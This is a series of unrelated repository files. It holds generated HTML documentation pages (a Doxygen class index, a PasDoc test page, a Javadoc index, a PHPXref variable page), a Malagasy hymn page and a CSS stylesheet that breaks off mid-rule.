<title>Create GUI: Class Index</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Create GUI
 <span id="projectnumber">2.0</span>
</div>
<div id="projectbrief">Unity 3D - User Interface Plugin</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.4 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li class="current"><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">Class Index</div> </div>
</div><!--header-->
<div class="contents">
<div class="qindex"><a class="qindex" href="#letter_C">C</a> | <a class="qindex" href="#letter_S">S</a></div>
<table style="margin: 10px; white-space: nowrap;" align="center" width="95%" border="0" cellspacing="0" cellpadding="0">
<tr><td rowspan="2" valign="bottom"><a name="letter_C"></a><table border="0" cellspacing="0" cellpadding="0"><tr><td><div class="ah">  C  </div></td></tr></table>
</td><td valign="top"><a class="el" href="class_c_g_group.html">CGGroup</a>   </td><td valign="top"><a class="el" href="class_c_g_scrollbar.html">CGScrollbar</a>   </td><td valign="top"><a class="el" href="class_c_g_texture.html">CGTexture</a>   </td><td></td></tr>
<tr><td valign="top"><a class="el" href="class_c_g_label.html">CGLabel</a>   </td><td valign="top"><a class="el" href="class_c_g_slider.html">CGSlider</a>   </td><td valign="top"><a class="el" href="class_c_g_window.html">CGWindow</a>   </td><td></td></tr>
<tr><td valign="top"><a class="el" href="class_c_g_button.html">CGButton</a>   </td><td valign="top"><a class="el" href="class_c_g_root.html">CGRoot</a>   </td><td valign="top"><a class="el" href="class_c_g_text_area.html">CGTextArea</a>   </td><td valign="top"><a class="el" href="class_create_g_u_i.html">CreateGUI</a>   </td><td></td></tr>
<tr><td valign="top"><a class="el" href="class_c_g_element.html">CGElement</a>   </td><td valign="top"><a class="el" href="class_c_g_scroll_area.html">CGScrollArea</a>   </td><td valign="top"><a class="el" href="class_c_g_text_field.html">CGTextField</a>   </td><td rowspan="2" valign="bottom"><a name="letter_S"></a><table border="0" cellspacing="0" cellpadding="0"><tr><td><div class="ah">  S  </div></td></tr></table>
</td><td></td></tr>
<tr><td></td><td></td><td></td><td></td></tr>
<tr><td></td><td></td><td></td><td valign="top"><a class="el" href="class_scaling_tool.html">ScalingTool</a>   </td><td></td></tr>
<tr><td></td><td></td><td></td><td></td><td></td></tr>
</table>
<div class="qindex"><a class="qindex" href="#letter_C">C</a> | <a class="qindex" href="#letter_S">S</a></div>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Wed Jun 12 2013 22:07:33 for Create GUI by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.4
</small></address>
</body>
</html>
|
src/main/assets/files/2495.html | heriniaina/fihirana-katolika | <html><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><link rel='stylesheet' type='text/css' href='../tononkira.css' /></head><body><ul class="hira-fihirana-list"><li style="color: red;"><b>Antsao ny Tompo</b> <i>p. 332</i></li></ul><p class='auteur'><i>Marc sy Dieudonné</i></p><p>Izao no didy lehibe tiako tandremaña<br />Dia ny fihavanana e ia !<br />Sy ny fifankatiavaña e ia !<br />Karaha ny nitiavako anarô jiaby e e e e i a !</p><p>Koa satria Jeso Tompo efa nanolotro<br />Ny aiñiny ho antsika noho ny fitiavaña.<br />Enga anie (in-2) - atsika jiaby hifankatia mariñy</p><p>Izay mahafoey ny aiñiny ho an’ny namaña<br />Sy izay nampanjaka hatrany ny fifankatiavaña<br />Dia mihavaña amin’Andriamanitra<br />Sy handova ny tena fiadañana.</p></body></html> |
tests/testcases_output/html/large_test/warning_value_member_tags.TMyClass.html | michaliskambi/pasdoc | <!DOCTYPE html>
<html lang="en">
<head>
<title>warning_value_member_tags: Class TMyClass</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<link rel="StyleSheet" type="text/css" href="pasdoc.css">
</head>
<body>
<table class="container"><tr><td class="navigation">
<p><a href="AllUnits.html" class="navigation">Units</a></p><p><a href="ClassHierarchy.html" class="navigation">Class Hierarchy</a></p><p><a href="AllClasses.html" class="navigation">Classes, Interfaces, Objects and Records</a></p><p><a href="AllTypes.html" class="navigation">Types</a></p><p><a href="AllVariables.html" class="navigation">Variables</a></p><p><a href="AllConstants.html" class="navigation">Constants</a></p><p><a href="AllFunctions.html" class="navigation">Functions and Procedures</a></p><p><a href="AllIdentifiers.html" class="navigation">Identifiers</a></p></td><td class="content">
<span id="TMyClass"></span><h1 class="cio">Class TMyClass</h1>
<div class="sections">
<div class="one_section"><a class="section" href="#PasDoc-Description">Description</a></div><div class="one_section"><a class="section" href="#PasDoc-Hierarchy">Hierarchy</a></div><div class="one_section"><a class="section" href="#PasDoc-Fields">Fields</a></div><div class="one_section">Methods</div><div class="one_section">Properties</div></div>
<span id="PasDoc-Description"></span><h2 class="unit">Unit</h2>
<p class="unitlink">
<a href="warning_value_member_tags.html">warning_value_member_tags</a></p>
<h2 class="declaration">Declaration</h2>
<p class="declaration">
<code>type TMyClass = class(TObject)</code></p>
<h2 class="description">Description</h2>
<p>
<p>
<p>
<p>This should cause 3 warnings: MyField1 has two descriptions, MyField2 has two descriptions, and NotExistsingMember does not exist.</p>
<span id="PasDoc-Hierarchy"></span><h2 class="hierarchy">Hierarchy</h2>
<ul class="hierarchy"><li class="ancestor">TObject</li>
<li class="thisitem">TMyClass</li></ul><h2 class="overview">Overview</h2>
<span id="PasDoc-Fields"></span><h3 class="summary">Fields</h3>
<table class="summary wide_list">
<tr class="list">
<td class="visibility"><a href="legend.html"><img src="public.gif" alt="Public" title="Public"></a></td>
<td class="itemcode"><code><b><a href="warning_value_member_tags.TMyClass.html#MyField1">MyField1</a></b>: Integer;</code></td>
</tr>
<tr class="list2">
<td class="visibility"><a href="legend.html"><img src="public.gif" alt="Public" title="Public"></a></td>
<td class="itemcode"><code><b><a href="warning_value_member_tags.TMyClass.html#MyField2">MyField2</a></b>: Integer;</code></td>
</tr>
</table>
<h2 class="description">Description</h2>
<h3 class="detail">Fields</h3>
<table class="detail wide_list">
<tr class="list">
<td class="visibility"><a href="legend.html"><img src="public.gif" alt="Public" title="Public"></a></td>
<td class="itemcode"><span id="MyField1"></span><code><b>MyField1</b>: Integer;</code></td>
</tr>
<tr><td colspan="2">
<p>
Second description of MyField1.</p>
</td></tr>
</table>
<table class="detail wide_list">
<tr class="list">
<td class="visibility"><a href="legend.html"><img src="public.gif" alt="Public" title="Public"></a></td>
<td class="itemcode"><span id="MyField2"></span><code><b>MyField2</b>: Integer;</code></td>
</tr>
<tr><td colspan="2">
<p>
First description of MyField2.</p>
</td></tr>
</table>
</td></tr></table></body></html>
|
doc/index-files/index-18.html | hypknowsys/WUMprep4Weka | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.5.0_04) on Sun Oct 30 19:56:12 CET 2005 -->
<TITLE>
T-Index
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
parent.document.title="T-Index";
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Package</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Use</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Index</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="index-17.html"><B>PREV LETTER</B></A>
<A HREF="index-19.html"><B>NEXT LETTER</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../index.html?index-filesindex-18.html" target="_top"><B>FRAMES</B></A>
<A HREF="index-18.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<A HREF="index-1.html">A</A> <A HREF="index-2.html">B</A> <A HREF="index-3.html">C</A> <A HREF="index-4.html">D</A> <A HREF="index-5.html">E</A> <A HREF="index-6.html">F</A> <A HREF="index-7.html">G</A> <A HREF="index-8.html">H</A> <A HREF="index-9.html">I</A> <A HREF="index-10.html">J</A> <A HREF="index-11.html">L</A> <A HREF="index-12.html">M</A> <A HREF="index-13.html">N</A> <A HREF="index-14.html">O</A> <A HREF="index-15.html">P</A> <A HREF="index-16.html">R</A> <A HREF="index-17.html">S</A> <A HREF="index-18.html">T</A> <A HREF="index-19.html">U</A> <A HREF="index-20.html">V</A> <A HREF="index-21.html">W</A> <HR>
<A NAME="_T_"><!-- --></A><H2>
<B>T</B></H2>
<DL>
<DT><A HREF="../org/hypknowsys/wumprep4weka/gui/WUMprepConfigurationCustomizer.ScrollableJTextArea.html#ta"><B>ta</B></A> -
Variable in class org.hypknowsys.wumprep4weka.gui.<A HREF="../org/hypknowsys/wumprep4weka/gui/WUMprepConfigurationCustomizer.ScrollableJTextArea.html" title="class in org.hypknowsys.wumprep4weka.gui">WUMprepConfigurationCustomizer.ScrollableJTextArea</A>
<DD>The text area
<DT><A HREF="../org/hypknowsys/wumprep/config/LogfileTemplate.html#template"><B>template</B></A> -
Variable in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/LogfileTemplate.html" title="class in org.hypknowsys.wumprep.config">LogfileTemplate</A>
<DD>The template line as defined in the WUMprep template file.
<DT><A HREF="../org/hypknowsys/wumprep/config/LogfileTemplate.html#templateFile"><B>templateFile</B></A> -
Variable in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/LogfileTemplate.html" title="class in org.hypknowsys.wumprep.config">LogfileTemplate</A>
<DD>The template file encapsulated by <code>this</code>.
<DT><A HREF="../org/hypknowsys/util/Test.html" title="class in org.hypknowsys.util"><B>Test</B></A> - Class in <A HREF="../org/hypknowsys/util/package-summary.html">org.hypknowsys.util</A><DD> <DT><A HREF="../org/hypknowsys/util/Test.html#Test()"><B>Test()</B></A> -
Constructor for class org.hypknowsys.util.<A HREF="../org/hypknowsys/util/Test.html" title="class in org.hypknowsys.util">Test</A>
<DD>
<DT><A HREF="../org/hypknowsys/wumprep4weka/gui/AbstractFilePropertyEditor.html#tf"><B>tf</B></A> -
Variable in class org.hypknowsys.wumprep4weka.gui.<A HREF="../org/hypknowsys/wumprep4weka/gui/AbstractFilePropertyEditor.html" title="class in org.hypknowsys.wumprep4weka.gui">AbstractFilePropertyEditor</A>
<DD>Text field showing the selected file or directory.
<DT><A HREF="../org/hypknowsys/wumprep/config/WUMprepConfiguration.html#toFile(java.lang.String)"><B>toFile(String)</B></A> -
Method in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/WUMprepConfiguration.html" title="class in org.hypknowsys.wumprep.config">WUMprepConfiguration</A>
<DD>Saves itself into a file that can be loaded again with the
<A HREF="../org/hypknowsys/wumprep/config/WUMprepConfiguration.html#WUMprepConfiguration(java.io.File)"><CODE>WUMprepConfiguration.WUMprepConfiguration(File)</CODE></A> constructor at a later time.
<DT><A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigBlank.html#toString()"><B>toString()</B></A> -
Method in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigBlank.html" title="class in org.hypknowsys.wumprep.config">WUMprepConfigBlank</A>
<DD>
<DT><A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigComment.html#toString()"><B>toString()</B></A> -
Method in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigComment.html" title="class in org.hypknowsys.wumprep.config">WUMprepConfigComment</A>
<DD>
<DT><A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigSection.html#toString()"><B>toString()</B></A> -
Method in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigSection.html" title="class in org.hypknowsys.wumprep.config">WUMprepConfigSection</A>
<DD>
<DT><A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigSetting.html#toString()"><B>toString()</B></A> -
Method in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigSetting.html" title="class in org.hypknowsys.wumprep.config">WUMprepConfigSetting</A>
<DD>
<DT><A HREF="../org/hypknowsys/wumprep/config/WUMprepConfiguration.html#toString()"><B>toString()</B></A> -
Method in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/WUMprepConfiguration.html" title="class in org.hypknowsys.wumprep.config">WUMprepConfiguration</A>
<DD>
<DT><A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigValue.html#toString()"><B>toString()</B></A> -
Method in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigValue.html" title="class in org.hypknowsys.wumprep.config">WUMprepConfigValue</A>
<DD>
<DT><A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigValueList.html#toString()"><B>toString()</B></A> -
Method in class org.hypknowsys.wumprep.config.<A HREF="../org/hypknowsys/wumprep/config/WUMprepConfigValueList.html" title="class in org.hypknowsys.wumprep.config">WUMprepConfigValueList</A>
<DD>
</DL>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Package</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Use</FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Index</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="index-17.html"><B>PREV LETTER</B></A>
<A HREF="index-19.html"><B>NEXT LETTER</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../index.html?index-filesindex-18.html" target="_top"><B>FRAMES</B></A>
<A HREF="index-18.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<A HREF="index-1.html">A</A> <A HREF="index-2.html">B</A> <A HREF="index-3.html">C</A> <A HREF="index-4.html">D</A> <A HREF="index-5.html">E</A> <A HREF="index-6.html">F</A> <A HREF="index-7.html">G</A> <A HREF="index-8.html">H</A> <A HREF="index-9.html">I</A> <A HREF="index-10.html">J</A> <A HREF="index-11.html">L</A> <A HREF="index-12.html">M</A> <A HREF="index-13.html">N</A> <A HREF="index-14.html">O</A> <A HREF="index-15.html">P</A> <A HREF="index-16.html">R</A> <A HREF="index-17.html">S</A> <A HREF="index-18.html">T</A> <A HREF="index-19.html">U</A> <A HREF="index-20.html">V</A> <A HREF="index-21.html">W</A> <HR>
</BODY>
</HTML>
|
_variables/pluginsettings.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $pluginsettings</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_variables';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logVariable('pluginsettings');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Variable Cross Reference</h3>
<h2><a href="index.html#pluginsettings">$pluginsettings</a></h2>
<b>Defined at:</b><ul>
<li><a href="../inc/collections/coll_settings.ctrl.php.html">/inc/collections/coll_settings.ctrl.php</A> -> <a href="../inc/collections/coll_settings.ctrl.php.source.html#l190"> line 190</A></li>
<li><a href="../inc/messaging/msg_settings.ctrl.php.html">/inc/messaging/msg_settings.ctrl.php</A> -> <a href="../inc/messaging/msg_settings.ctrl.php.source.html#l71"> line 71</A></li>
</ul>
<br><b>Referenced 6 times:</b><ul>
<li><a href="../inc/collections/coll_settings.ctrl.php.html">/inc/collections/coll_settings.ctrl.php</a> -> <a href="../inc/collections/coll_settings.ctrl.php.source.html#l190"> line 190</a></li>
<li><a href="../inc/collections/coll_settings.ctrl.php.html">/inc/collections/coll_settings.ctrl.php</a> -> <a href="../inc/collections/coll_settings.ctrl.php.source.html#l191"> line 191</a></li>
<li><a href="../inc/collections/coll_settings.ctrl.php.html">/inc/collections/coll_settings.ctrl.php</a> -> <a href="../inc/collections/coll_settings.ctrl.php.source.html#l197"> line 197</a></li>
<li><a href="../inc/messaging/msg_settings.ctrl.php.html">/inc/messaging/msg_settings.ctrl.php</a> -> <a href="../inc/messaging/msg_settings.ctrl.php.source.html#l71"> line 71</a></li>
<li><a href="../inc/messaging/msg_settings.ctrl.php.html">/inc/messaging/msg_settings.ctrl.php</a> -> <a href="../inc/messaging/msg_settings.ctrl.php.source.html#l72"> line 72</a></li>
<li><a href="../inc/messaging/msg_settings.ctrl.php.html">/inc/messaging/msg_settings.ctrl.php</a> -> <a href="../inc/messaging/msg_settings.ctrl.php.source.html#l78"> line 78</a></li>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
www/addons/lrj_guide/recouse/css/search_new.css | xianhuachang/one | /*index643973929211478*/
@charset "utf-8";
body{
color: #525252;
background-color: #f4f4f4;
}
a{
color: #525252;
}
input{
border: none;
font-family: 微软雅黑;
color: #a4a4a4;
}
.tab .frame{
height: 51px;
border-left: 4px solid #ec5b4a;
position: fixed;
top: 107px;
background-color: #fff;
z-index: 99!important;
}
.tab .frame span{
line-height: 51px;
vertical-align: top;
border-bottom: 1px solid #eaeaea;
color: #000;
width:92px;
text-align:center;
display: inline-block;
*display: inline;
*zoom: 1;
z-index: 19;
position: relative;
top:0;
left:0;
background-color: #fff;
}
.touch-box{
width:596px;
height:52px;
position: relative;
top:-52px;
z-index: 9;
/*padding-left:88px;*/
}
.tab .box{
height: 52px;
position: absolute;
top: 0;
left: 92px;
overflow: hidden;
z-index: 999;
}
.tab .order{
height: 51px;
cursor: pointer;
overflow: hidden;
border-bottom: 1px solid #eaeaea;
}
.tab .order li{
height: 52px;
float: left;
display: inline-block;
*display: inline;
*zoom: 1;
}
.tab .order a{
display: block;
width: 32px;
height: 25px;
margin-top: 13px;
/*color: #aeaeae;*/
color:#000;
line-height: 25px;
text-align: center;
border-radius: 15px;
}
.tab .order a.on{
background-color: #e74c3a;
color: #fff;
}
.tab {
max-width: 768px;
margin: 0 auto;
}
/*首字母导航end*/
@media(max-width: 640px){
.label,.category,.productlist,.paixu{max-width:620px;margin:0 10px;}
.label .label1{width: 100%;}
.tab .frame{width: 296px;}
.tab .box{width: 9999px;}
.touch-box{width: 296px;overflow: hidden;}
.tab .order li{margin-right: 15px;}
.category li .info{width: 100%;}
.category li .info .data{width: 100%;}
.category li .brands{width: 100%;}
.category li .brands .data{width: 100%;}
.brand .product li a{width: 250px;height: 100%;}
.scroll{width: 280px;}
#seachInput{margin-left: -33px;}
}
@media(min-width: 641px){
.label,.category,.productlist,.paixu{min-width:621px;margin:0 10px;}
.label .label1{width: 100%;}
.tab .frame{width: 596px;}
.tab .box{width: 9999px;}
.tab .order{margin-left: 4px;}
.tab .order li{margin-right: 11px;}
.category li .info{width: 100%;}
.category li .info .data{width: 100%;}
.category li .brands{width: 100%;}
.category li .brands .data{width: 100%;}
.brand .product li a{width: 550px;height: 100%;}
.scroll{width:580px; }
}
/*页面上方搜索框区域begin*/
.search .s-area{
width: 100%;
height:52px;
background-color:#eaeaea;
text-align: center;
}
.s-area .key-word{
width:98%;
height: 28px;
padding-left: 5px;
line-height: 28px;
text-align:left;
border:1px solid #ccc;
}
.s-area .search_l{
width: 55px;
height:52px;
display:inline-block;
position:absolute;
top:0;
left:0;
}
.s-area .search_c{
height:52px;
line-height:52px;
position:absolute;
top:0;
right:55px;
left:55px;
}
.s-area .search_r{
width: 55px;
height:52px;
display:inline-block;
position:absolute;
top:0;
right:0;
}
.s-area .btn{
width: 21px;
height: 21px;
background: url(../images/search.jpg) no-repeat 0 0;
vertical-align: top;
margin-top: 12px;
}
.search .cover{
width: 100%;
height: 11px;
background-color: #f4f4f4;
}
/*页面上方搜索框区域begin*/
/*Tab 标签begin*/
.tab{
margin: 0 auto;
}
.label{
margin: 0 10px;
background-color: #fff;
border-radius:5px 5px 0 0
}
.category{
margin: 0 10px;
background-color: #fff;
}
.noshop{
background-color: #fff;
text-align:center;
padding:20px 0px;
color:#F00;
}
.productlist{
margin: 0 10px;
}
.label{
height: 50px;
font-size: 15px;
border-bottom: 1px solid #eaeaea;
}
.label a{
height: 50px;
line-height: 50px;
text-align: center;
display: inline-block;
*display: inline;
*zoom: 1;
}
.label i{
width: 14px;
height: 14px;
background: url(../images/search.jpg) no-repeat;
vertical-align: top;
margin-top: 18px;
margin-right: 9px;
display: inline-block;
*display: inline;
*zoom: 1;
}
.label .label1 i{
background-position: -44px 0;
}
.label .label1 i.on{
background-position: -26px 0;
}
/*Tab 标签end*/
/*首字母导航begin*/
/*分类浏览begin*/
.category li{
border-bottom: 1px solid #eaeaea;
margin:0 auto;
padding:0px 2% 20px 2%;
}
.category li .arrow{
width: 7px;
height: 13px;
background: url(../images/search.jpg) no-repeat -99px 0;
vertical-align: top;
float: right;
margin-right: 16px;
display: inline-block;
*display: inline;
*zoom: 1;
}
.category .info .arrow{
width: 7px;
height: 13px;
background: url(../images/search.jpg) no-repeat -99px 0;
vertical-align: top;
float: right;
margin-top: 29px;
margin-right: 16px;
display: inline-block;
*display: inline;
*zoom: 1;
}
.category .icon{
width: 100%;
height: 70px;
position: absolute;
top: 0;
left: 0;
}
.category .icon i{
width: 32px;
height: 35px;
background: url(../images/search.jpg) no-repeat;
vertical-align: top;
margin: 19px 23px auto 15px;
display: inline-block;
*display: inline;
*zoom: 1;
}
.category li .info{
float: left;
